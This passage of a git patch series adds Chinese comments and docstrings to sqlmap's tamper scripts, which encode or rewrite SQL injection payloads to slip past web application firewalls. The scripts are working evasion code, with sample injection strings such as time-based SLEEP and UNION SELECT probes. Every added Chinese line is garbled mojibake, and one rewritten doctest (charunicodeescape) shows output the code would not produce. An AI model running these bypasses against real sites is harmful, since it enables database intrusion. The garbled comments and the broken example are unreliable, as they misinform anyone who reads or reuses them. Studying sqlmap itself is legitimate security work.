鍦╬ayload鐨勬湯灏炬坊鍔犱竴涓狽ULL瀛楄妭锛%00锛夛紝杩欏湪瀵逛粯鏌愪簺寮盬eb搴旂敤闃茬伀澧欐椂闈炲父鏈夌敤锛岀壒鍒槸褰撳悗绔暟鎹簱绠$悊绯荤粺鏄疢icrosoft Access鏃躲 - Requirement: - * Microsoft Access + 瑕佹眰锛 + * 浠呴傜敤浜嶮icrosoft Access鏁版嵁搴撱 - Notes: - * Useful to bypass weak web application firewalls when the back-end - database management system is Microsoft Access - further uses are - also possible + 娉ㄦ剰锛 + * 杩欑鎶鏈櫎浜嗗彲浠ョ粫杩嘩eb搴旂敤闃茬伀澧欏锛岃繕鏈夊叾浠栧彲鑳界殑鐢ㄩ斻 - Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection + 鍙傝冮摼鎺ワ細 + * http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection - >>> tamper('1 AND 1=1') - '1 AND 1=1%00' + 绀轰緥锛 + >>> tamper('1 AND 1=1') + '1 AND 1=1%00' """ - return "%s%%00" % payload if payload else payload + return "%s%%00" % payload if payload else payload # 濡傛灉payload涓嶄负绌猴紝鍒欏湪鍏舵湯灏炬坊鍔燦ULL瀛楄妭锛%00锛 From 7486672d56bac2a2e348b2711bc68ac719e9a16e Mon Sep 17 00:00:00 2001 From: sck <2238502556@qq.com> Date: Thu, 26 Dec 2024 08:30:37 +0800 Subject: [PATCH 5/9] =?UTF-8?q?=E4=BF=AE=E6=94=B9?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- src/sqlmap-master/tamper/base64encode.py | 24 ++++++--- src/sqlmap-master/tamper/between.py | 52 ++++++++++--------- src/sqlmap-master/tamper/binary.py | 43 +++++++-------- src/sqlmap-master/tamper/bluecoat.py | 38 +++++++++----- src/sqlmap-master/tamper/chardoubleencode.py | 35 +++++++------ src/sqlmap-master/tamper/charencode.py | 49 ++++++++++------- src/sqlmap-master/tamper/charunicodeencode.py | 48 +++++++++++------ src/sqlmap-master/tamper/charunicodeescape.py | 37 ++++++++----- 8 files changed, 196 insertions(+), 130 deletions(-) diff --git a/src/sqlmap-master/tamper/base64encode.py b/src/sqlmap-master/tamper/base64encode.py index 9e81dc9..ff35fd2 100644 --- a/src/sqlmap-master/tamper/base64encode.py +++ b/src/sqlmap-master/tamper/base64encode.py @@ -5,20 +5,28 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -from lib.core.convert import encodeBase64 -from lib.core.enums import PRIORITY +from lib.core.convert import encodeBase64 # 瀵煎叆Base64缂栫爜鍑芥暟 +from lib.core.enums import PRIORITY # 瀵煎叆浼樺厛绾ф灇涓 -__priority__ = PRIORITY.LOW +__priority__ = PRIORITY.LOW # 璁剧疆浼樺厛绾т负浣 def dependencies(): pass def tamper(payload, **kwargs): - """ - Base64-encodes all characters in a given payload + """ + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢鎵鏈夊瓧绗﹁繘琛孊ase64缂栫爜銆 + + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 鍔熻兘锛 + 瀵硅緭鍏ョ殑payload杩涜Base64缂栫爜锛岃繖鍙互鐢ㄤ簬缁曡繃鏌愪簺瀵圭壒娈婂瓧绗︽湁闄愬埗鐨勫畨鍏ㄩ槻鎶ゆ帾鏂姐 - >>> tamper("1' AND SLEEP(5)#") - 'MScgQU5EIFNMRUVQKDUpIw==' + 绀轰緥锛 + >>> tamper("1' AND SLEEP(5)#") + 'MScgQU5EIFNMRUVQKDUpIw==' """ - return encodeBase64(payload, binary=False) if payload else payload + return encodeBase64(payload, binary=False) if payload else payload # 濡傛灉payload涓嶄负绌猴紝鍒欏鍏惰繘琛孊ase64缂栫爜锛宐inary=False琛ㄧず缁撴灉涓篈SCII瀛楃涓 diff --git a/src/sqlmap-master/tamper/between.py b/src/sqlmap-master/tamper/between.py index d07e224..41fd980 100644 --- a/src/sqlmap-master/tamper/between.py +++ b/src/sqlmap-master/tamper/between.py @@ -16,44 +16,46 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #' + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢澶т簬鎿嶄綔绗︼紙'>锛夋浛鎹负'NOT BETWEEN 0 AND #'锛屽皢绛変簬鎿嶄綔绗︼紙'='锛夋浛鎹负'BETWEEN # AND #'銆 - Tested against: - * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 + 娴嬭瘯鎯呭喌锛 + * 寰蒋 SQL Server 2005 + * MySQL 4, 5.0 鍜 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the greater than character - * The BETWEEN clause is SQL standard. Hence, this tamper script - should work against all (?) databases - - >>> tamper('1 AND A > B--') - '1 AND A NOT BETWEEN 0 AND B--' - >>> tamper('1 AND A = B--') - '1 AND A BETWEEN B AND B--' - >>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()') - '1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()' + 娉ㄦ剰锛 + * 杩欎釜鏇挎崲寰堟湁鐢紝鍙互缁曡繃閭d簺鍙繃婊ゅぇ浜庡瓧绗︾殑寮盬eb搴旂敤闃茬伀澧欍 + * BETWEEN瀛愬彞鏄疭QL鏍囧噯銆傚洜姝わ紝杩欎釜tamper鑴氭湰搴旇閫傜敤浜庢墍鏈夋暟鎹簱銆 + + 绀轰緥锛 + >>> tamper('1 AND A > B--') + '1 AND A NOT BETWEEN 0 AND B--' + >>> tamper('1 AND A = B--') + '1 AND A BETWEEN B AND B--' + >>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()') + '1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()' """ - retVal = payload - if payload: + retVal = payload # 鍒濆鍖栬繑鍥炲 + + if payload:# 濡傛灉payload涓嶄负绌 + # 浣跨敤姝e垯琛ㄨ揪寮忔煡鎵惧苟鏇挎崲澶т簬鎿嶄綔绗︼紙'>锛 match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload) - if match: + if match: # 濡傛灉鎵惧埌鍖归厤椤 _ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5)) - retVal = retVal.replace(match.group(0), _) + retVal = retVal.replace(match.group(0), _) # 鏇挎崲鍖归厤椤 else: - retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload) + retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload) # 鏇挎崲澶т簬鎿嶄綔绗 - if retVal == payload: + if retVal == payload: # 濡傛灉杩斿洖鍊兼湭鏀瑰彉锛屽皾璇曟浛鎹㈢瓑浜庢搷浣滅锛'=锛 match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*([\w()]+)\s*", payload) - if match: + if match:# 濡傛灉鎵惧埌鍖归厤椤 _ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5)) - retVal = retVal.replace(match.group(0), _) + retVal = retVal.replace(match.group(0), _)# 鏇挎崲鍖归厤椤 + - return retVal + return retVal# 杩斿洖绡℃敼鍚庣殑payload diff --git a/src/sqlmap-master/tamper/binary.py b/src/sqlmap-master/tamper/binary.py index b0151a3..023047f 100644 --- a/src/sqlmap-master/tamper/binary.py +++ b/src/sqlmap-master/tamper/binary.py @@ -16,28 +16,29 @@ def dependencies(): def tamper(payload, **kwargs): """ - Injects keyword binary where possible - - Requirement: - * MySQL - - >>> tamper('1 UNION ALL SELECT NULL, NULL, NULL') - '1 UNION ALL SELECT binary NULL, binary NULL, binary NULL' - >>> tamper('1 AND 2>1') - '1 AND binary 2>binary 1' - >>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END') - 'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END' + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屾敞鍏ySQL涓殑鍏抽敭瀛'binary'锛屼互灏濊瘯缁曡繃鏌愪簺瀹夊叏闃叉姢鎺柦銆 + + 瑕佹眰锛 + * 浠呴傜敤浜嶮ySQL鏁版嵁搴撱 + + 绀轰緥锛 + >>> tamper('1 UNION ALL SELECT NULL, NULL, NULL') + '1 UNION ALL SELECT binary NULL, binary NULL, binary NULL' + >>> tamper('1 AND 2>1') + '1 AND binary 2>binary 1' + >>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END') + 'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲 - if payload: - retVal = re.sub(r"\bNULL\b", "binary NULL", retVal) - retVal = re.sub(r"\b(THEN\s+)(\d+|0x[0-9a-f]+)(\s+ELSE\s+)(\d+|0x[0-9a-f]+)", r"\g<1>binary \g<2>\g<3>binary \g<4>", retVal) - retVal = re.sub(r"(\d+\s*[>=]\s*)(\d+)", r"binary \g<1>binary \g<2>", retVal) - retVal = re.sub(r"\b((AND|OR)\s*)(\d+)", r"\g<1>binary \g<3>", retVal) - retVal = re.sub(r"([>=]\s*)(\d+)", r"\g<1>binary \g<2>", retVal) - retVal = re.sub(r"\b(0x[0-9a-f]+)", r"binary \g<1>", retVal) - retVal = re.sub(r"(\s+binary)+", r"\g<1>", retVal) + if payload: # 濡傛灉payload涓嶄负绌 + retVal = re.sub(r"\bNULL\b", "binary NULL", retVal) # 鏇挎崲NULL涓篵inary NULL + retVal = re.sub(r"\b(THEN\s+)(\d+|0x[0-9a-f]+)(\s+ELSE\s+)(\d+|0x[0-9a-f]+)", r"\g<1>binary \g<2>\g<3>binary \g<4>", retVal)# 鍦═HEN鍜孍LSE鍚庣殑鏁板瓧鎴栧崄鍏繘鍒跺煎墠娣诲姞binary鍏抽敭瀛 + retVal = re.sub(r"(\d+\s*[>=]\s*)(\d+)", r"binary \g<1>binary \g<2>", retVal)# 鍦ㄦ暟瀛楁瘮杈冩搷浣滀腑娣诲姞binary鍏抽敭瀛 + retVal = re.sub(r"\b((AND|OR)\s*)(\d+)", r"\g<1>binary \g<3>", retVal)# 鍦ˋND鎴朞R鏉′欢鍚庣殑鏁板瓧鍓嶆坊鍔燽inary鍏抽敭瀛 + retVal = re.sub(r"([>=]\s*)(\d+)", r"\g<1>binary \g<2>", retVal)# 鍦ㄦ瘮杈冩搷浣滅鍓嶇殑鏁板瓧鍓嶆坊鍔燽inary鍏抽敭瀛 + retVal = re.sub(r"\b(0x[0-9a-f]+)", r"binary \g<1>", retVal) # 鍦ㄥ崄鍏繘鍒跺煎墠娣诲姞binary鍏抽敭瀛 + retVal = re.sub(r"(\s+binary)+", r"\g<1>", retVal) # 绉婚櫎澶氫綑鐨刡inary鍏抽敭瀛 - return retVal + return retVal # 杩斿洖绡℃敼鍚庣殑payload diff --git a/src/sqlmap-master/tamper/bluecoat.py b/src/sqlmap-master/tamper/bluecoat.py index 7438d30..46e34e5 100644 --- a/src/sqlmap-master/tamper/bluecoat.py +++ b/src/sqlmap-master/tamper/bluecoat.py @@ -5,11 +5,12 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import re +import re# 瀵煎叆姝e垯琛ㄨ揪寮忔ā鍧 -from lib.core.data import kb -from lib.core.enums import PRIORITY +from lib.core.data import kb # 瀵煎叆鐭ヨ瘑搴擄紙鍖呭惈SQL鍏抽敭瀛楃瓑淇℃伅锛 +from lib.core.enums import PRIORITY # 瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏅 __priority__ = PRIORITY.NORMAL def dependencies(): @@ -17,34 +18,45 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character after SQL statement with a valid random blank character. Afterwards replace character '=' with operator LIKE + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛岄氳繃鏇挎崲绌烘牸瀛楃鍜岀瓑鍙锋潵缁曡繃Blue Coat SGOS鐨刉AF銆 - Requirement: - * Blue Coat SGOS with WAF activated as documented in - https://kb.bluecoat.com/index?page=content&id=FAQ2147 + 鍔熻兘锛 + * 灏哠QL璇彞鍚庣殑绌烘牸鏇挎崲涓烘湁鏁堢殑闅忔満绌虹櫧瀛楃銆 + * 灏嗙瓑鍙凤紙=锛夋浛鎹负LIKE鎿嶄綔绗︺ - Tested against: + 瑕佹眰锛 + * Blue Coat SGOS锛屼笖WAF宸叉縺娲伙紝鍙傝冩枃妗o細https://kb.bluecoat.com/index?page=content&id=FAQ2147 + + 娴嬭瘯鎯呭喌锛 * MySQL 5.1, SGOS - Notes: - * Useful to bypass Blue Coat's recommended WAF rule configuration + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃Blue Coat鎺ㄨ崘鐨刉AF瑙勫垯閰嶇疆寰堟湁鐢ㄣ - >>> tamper('SELECT id FROM users WHERE id = 1') - 'SELECT%09id FROM%09users WHERE%09id LIKE 1' + 绀轰緥锛 + >>> tamper('SELECT id FROM users WHERE id = 1') + 'SELECT%09id FROM%09users WHERE%09id LIKE 1' """ def process(match): + """ + 杈呭姪鍑芥暟锛岀敤浜庡鐞嗘鍒欏尮閰嶇殑缁撴灉銆 + 灏嗗尮閰嶅埌鐨凷QL鍏抽敭瀛楁浛鎹负甯︽湁%09锛堝埗琛ㄧ锛夌殑鐗堟湰銆 + """ word = match.group('word') if word.upper() in kb.keywords: return match.group().replace(word, "%s%%09" % word) else: return match.group() - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲 if payload: + # 鏇挎崲SQL鍏抽敭瀛楀悗璺熼潪鍗曡瘝瀛楃鎴栧瓧绗︿覆鏈熬鐨勭┖鏍 retVal = re.sub(r"\b(?P[A-Z_]+)(?=[^\w(]|\Z)", process, retVal) + # 灏嗙瓑鍙锋浛鎹负LIKE鎿嶄綔绗 retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) + # 绉婚櫎澶氫綑鐨%09绌烘牸 retVal = retVal.replace("%09 ", "%09") return retVal diff --git a/src/sqlmap-master/tamper/chardoubleencode.py b/src/sqlmap-master/tamper/chardoubleencode.py index ea711b4..6e032fc 100644 --- a/src/sqlmap-master/tamper/chardoubleencode.py +++ b/src/sqlmap-master/tamper/chardoubleencode.py @@ -5,10 +5,11 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import string +import string # 瀵煎叆瀛楃涓插鐞嗘ā鍧 -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负浣 __priority__ = PRIORITY.LOW def dependencies(): @@ -16,27 +17,31 @@ def dependencies(): def tamper(payload, **kwargs): """ - Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554) + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛岄氳繃鍙岄噸URL缂栫爜鎵鏈夊瓧绗︼紙涓嶅鐞嗗凡缁忕紪鐮佺殑瀛楃锛夈 - Notes: - * Useful to bypass some weak web application firewalls that do not double URL-decode the request before processing it through their ruleset + 娉ㄦ剰锛 + * 杩欎釜鎶鏈緢鏈夌敤锛屽彲浠ョ粫杩囦竴浜涗笉杩涜鍙岄噸URL瑙g爜鐨勫急Web搴旂敤闃茬伀澧欍 - >>> tamper('SELECT FIELD FROM%20TABLE') - '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545' + 绀轰緥锛 + >>> tamper('SELECT FIELD FROM%20TABLE') + '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲 - if payload: - retVal = "" - i = 0 - while i < len(payload): + if payload: # 濡傛灉payload涓嶄负绌 + retVal = "" # 鍒濆鍖栬繑鍥炲煎瓧绗︿覆 + i = 0 # 鍒濆鍖栫储寮 + + while i < len(payload): # 閬嶅巻payload涓殑姣忎釜瀛楃 + # 濡傛灉褰撳墠瀛楃鏄%涓斿悗闈袱涓瓧绗︽槸鍗佸叚杩涘埗鏁板瓧锛堝凡缂栫爜鐨勫瓧绗︼級锛屽垯杩涜鍙岄噸缂栫爜 if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += '%%25%s' % payload[i + 1:i + 3] - i += 3 + i += 3 # 绉诲姩绱㈠紩锛岃烦杩囧凡澶勭悊鐨勪笁涓瓧绗 else: + # 瀵规湭缂栫爜鐨勫瓧绗﹁繘琛屽弻閲峌RL缂栫爜 retVal += '%%25%.2X' % ord(payload[i]) - i += 1 + i += 1 # 绉诲姩绱㈠紩锛屽鐞嗕笅涓涓瓧绗 - return retVal + return retVal # 杩斿洖绡℃敼鍚庣殑payload diff --git a/src/sqlmap-master/tamper/charencode.py b/src/sqlmap-master/tamper/charencode.py index 181f978..6806af2 100644 --- a/src/sqlmap-master/tamper/charencode.py +++ b/src/sqlmap-master/tamper/charencode.py @@ -5,45 +5,54 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import string +import string # 瀵煎叆瀛楃涓插父閲忓簱锛岀敤浜庡鐞嗗瓧绗﹀拰鍗佸叚杩涘埗鏁板瓧 -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 -__priority__ = PRIORITY.LOWEST +__priority__ = PRIORITY.LOWEST# 璁剧疆浼樺厛绾т负鏈浣 def dependencies(): pass def tamper(payload, **kwargs): """ - URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛岄氳繃URL缂栫爜鎵鏈夊瓧绗︼紙涓嶅鐞嗗凡缁忕紪鐮佺殑瀛楃锛夈 - Tested against: + 鍔熻兘锛 + * 灏嗚緭鍏ョ殑SQL璇彞涓殑鎵鏈夊瓧绗﹁繘琛孶RL缂栫爜銆 + * 渚嬪锛屽皢'SELECT'杞崲涓'%53%45%4C%45%43%54'銆 + + 娴嬭瘯鎯呭喌锛 * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 + * MySQL 4, 5.0 鍜 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 - Notes: - * Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset - * The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS + 娉ㄦ剰锛 + * 杩欎釜鏂规硶瀵逛簬缁曡繃涓浜涢潪甯稿急鐨刉eb搴旂敤闃茬伀澧欏緢鏈夌敤锛岃繖浜涢槻鐏鍦ㄥ鐞嗚姹傛椂涓嶈繘琛孶RL瑙g爜銆 + * Web鏈嶅姟鍣ㄤ細浼犻掕В鐮佸悗鐨勭増鏈紝鍥犳搴旇閫傜敤浜庝换浣曟暟鎹簱绠$悊绯荤粺锛圖BMS锛夈 - >>> tamper('SELECT FIELD FROM%20TABLE') - '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45' + 绀轰緥锛 + >>> tamper('SELECT FIELD FROM%20TABLE') + '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45' """ - retVal = payload - if payload: - retVal = "" - i = 0 + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload + if payload: # 濡傛灉payload涓嶄负绌 + retVal = "" # 鍒濆鍖栬繑鍥炲煎瓧绗︿覆 + i = 0 # 鍒濆鍖栫储寮 + # 閬嶅巻payload涓殑姣忎釜瀛楃 while i < len(payload): + # 妫鏌ュ綋鍓嶅瓧绗︽槸鍚︿负%涓斿悗闈袱涓瓧绗︽槸鍗佸叚杩涘埗鏁板瓧锛堝凡缂栫爜鐨勫瓧绗︼級 if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: - retVal += payload[i:i + 3] - i += 3 + retVal += payload[i:i + 3] # 濡傛灉鏄凡缂栫爜鐨勫瓧绗︼紝鐩存帴娣诲姞鍒拌繑鍥炲 + i += 3 # 绉诲姩绱㈠紩锛岃烦杩囧凡澶勭悊鐨勪笁涓瓧绗 else: - retVal += '%%%.2X' % ord(payload[i]) - i += 1 + # 瀵规湭缂栫爜鐨勫瓧绗﹁繘琛孶RL缂栫爜锛屽苟娣诲姞鍒拌繑鍥炲 + retVal += '%%%.2X' % ord(payload[i])# 灏嗗瓧绗﹁浆鎹负鍏禔SCII鍊肩殑鍗佸叚杩涘埗琛ㄧず + i += 1 # 绉诲姩绱㈠紩锛屽鐞嗕笅涓涓瓧绗 + - return retVal + return retVal # 杩斿洖绡℃敼鍚庣殑payload diff --git a/src/sqlmap-master/tamper/charunicodeencode.py b/src/sqlmap-master/tamper/charunicodeencode.py index 6e8b429..c8f72ce 100644 --- a/src/sqlmap-master/tamper/charunicodeencode.py +++ b/src/sqlmap-master/tamper/charunicodeencode.py @@ -8,46 +8,62 @@ See the file 'LICENSE' for copying permission import os import string -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import PRIORITY +from lib.core.common import singleTimeWarnMessage # 浠庢牳蹇冨簱瀵煎叆鍗曟璀﹀憡娑堟伅鍑芥暟 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 -__priority__ = PRIORITY.LOWEST +__priority__ = PRIORITY.LOWEST # 璁剧疆浼樺厛绾т负鏈浣 def dependencies(): + """ + 杩欎釜鍑芥暟鐢ㄤ簬鍦ㄨ繍琛屾椂妫鏌ヤ緷璧栧叧绯伙紝骞剁粰鍑鸿鍛婁俊鎭 + + 鍔熻兘锛 + - 鏄剧ず涓鏉″崟娆¤鍛婃秷鎭紝鎸囧嚭褰撳墠鐨則amper鑴氭湰浠呴傜敤浜嶢SP鎴朅SP.NET Web搴旂敤绋嬪簭銆 + """ singleTimeWarnMessage("tamper script '%s' is only meant to be run against ASP or ASP.NET web applications" % os.path.basename(__file__).split(".")[0]) def tamper(payload, **kwargs): """ - Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛岄氳繃Unicode-URL缂栫爜鎵鏈夊瓧绗︼紙涓嶅鐞嗗凡缁忕紪鐮佺殑瀛楃锛夈 + + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 鍔熻兘锛 + - 灏嗚緭鍏ョ殑payload涓殑瀛楃杞崲涓篣nicode-URL缂栫爜鏍煎紡锛堜緥濡傦紝'SELECT'杞崲涓'%u0053%u0045%u004C%u0045%u0043%u0054'锛夈 - Requirement: - * ASP - * ASP.NET + 瑕佹眰锛 + * 浠呴傜敤浜嶢SP鍜孉SP.NET鐜銆 - Tested against: + 娴嬭瘯鎯呭喌锛 * Microsoft SQL Server 2000 * Microsoft SQL Server 2005 * MySQL 5.1.56 * PostgreSQL 9.0.3 - Notes: - * Useful to bypass weak web application firewalls that do not unicode URL-decode the request before processing it through their ruleset + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃閭d簺鍦ㄥ鐞嗚姹傚墠涓嶈繘琛孶nicode URL瑙g爜鐨勫急Web搴旂敤闃茬伀澧欏緢鏈夌敤銆 - >>> tamper('SELECT FIELD%20FROM TABLE') - '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045' + 绀轰緥锛 + >>> tamper('SELECT FIELD%20FROM TABLE') + '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload - if payload: - retVal = "" - i = 0 + if payload: # 濡傛灉payload涓嶄负绌 + retVal = "" # 鍒濆鍖栬繑鍥炲煎瓧绗︿覆 + i = 0 # 鍒濆鍖栫储寮 + # 閬嶅巻payload涓殑姣忎釜瀛楃 while i < len(payload): + # 濡傛灉褰撳墠瀛楃鏄%涓斿悗闈袱涓瓧绗︽槸鍗佸叚杩涘埗鏁板瓧锛堝凡缂栫爜鐨勫瓧绗︼級锛屽垯杩涜Unicode-URL缂栫爜 if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += "%%u00%s" % payload[i + 1:i + 3] i += 3 else: + # 瀵规湭缂栫爜鐨勫瓧绗﹁繘琛孶nicode-URL缂栫爜锛屽苟娣诲姞鍒拌繑鍥炲 retVal += '%%u%.4X' % ord(payload[i]) i += 1 diff --git a/src/sqlmap-master/tamper/charunicodeescape.py b/src/sqlmap-master/tamper/charunicodeescape.py index 8fe05c0..41d47a6 100644 --- a/src/sqlmap-master/tamper/charunicodeescape.py +++ b/src/sqlmap-master/tamper/charunicodeescape.py @@ -5,35 +5,48 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import string +import string # 瀵煎叆瀛楃涓插父閲忓簱锛岀敤浜庡鐞嗗瓧绗﹀拰鍗佸叚杩涘埗鏁板瓧 -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏅 __priority__ = PRIORITY.NORMAL def tamper(payload, **kwargs): """ - Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛岄氳繃Unicode杞箟闈炵紪鐮佸瓧绗︼紙涓嶅鐞嗗凡缁忕紪鐮佺殑瀛楃锛夈 - Notes: - * Useful to bypass weak filtering and/or WAFs in JSON contexes + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 - >>> tamper('SELECT FIELD FROM TABLE') - '\\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\u0054\\\\u0020\\\\u0046\\\\u0049\\\\u0045\\\\u004C\\\\u0044\\\\u0020\\\\u0046\\\\u0052\\\\u004F\\\\u004D\\\\u0020\\\\u0054\\\\u0041\\\\u0042\\\\u004C\\\\u0045' + 鍔熻兘锛 + - 灏嗚緭鍏ョ殑payload涓殑瀛楃杞崲涓篣nicode杞箟搴忓垪锛堜緥濡傦紝'SELECT'杞崲涓'\u0053\u0045\u004C\u0045\u0043\u0054'锛夈 + + 娉ㄦ剰锛 + * 杩欎釜鏂规硶瀵逛簬缁曡繃鍦↗SON涓婁笅鏂囦腑鐨勫急杩囨护鍜/鎴朩eb搴旂敤闃茬伀澧欙紙WAFs锛夊緢鏈夌敤銆 + + 绀轰緥锛 + >>> tamper('SELECT FIELD FROM TABLE') + '\\u0053\\u0045\\u004C\\u0045\\u0043\\u0054 \\u0020\\u0046\\u0049\\u0045\\u004C\\u0044 \\u0046\\u0052\\u004F\\u004D \\u0054\\u0041\\u0042\\u004C\\u0045' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload + - if payload: - retVal = "" - i = 0 + if payload: # 濡傛灉payload涓嶄负绌 + retVal = "" # 鍒濆鍖栬繑鍥炲煎瓧绗︿覆 + i = 0 # 鍒濆鍖栫储寮 + # 閬嶅巻payload涓殑姣忎釜瀛楃 while i < len(payload): + # 濡傛灉褰撳墠瀛楃鏄%涓斿悗闈袱涓瓧绗︽槸鍗佸叚杩涘埗鏁板瓧锛堝凡缂栫爜鐨勫瓧绗︼級锛屽垯杩涜Unicode杞箟 if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += "\\u00%s" % payload[i + 1:i + 3] i += 3 else: + # 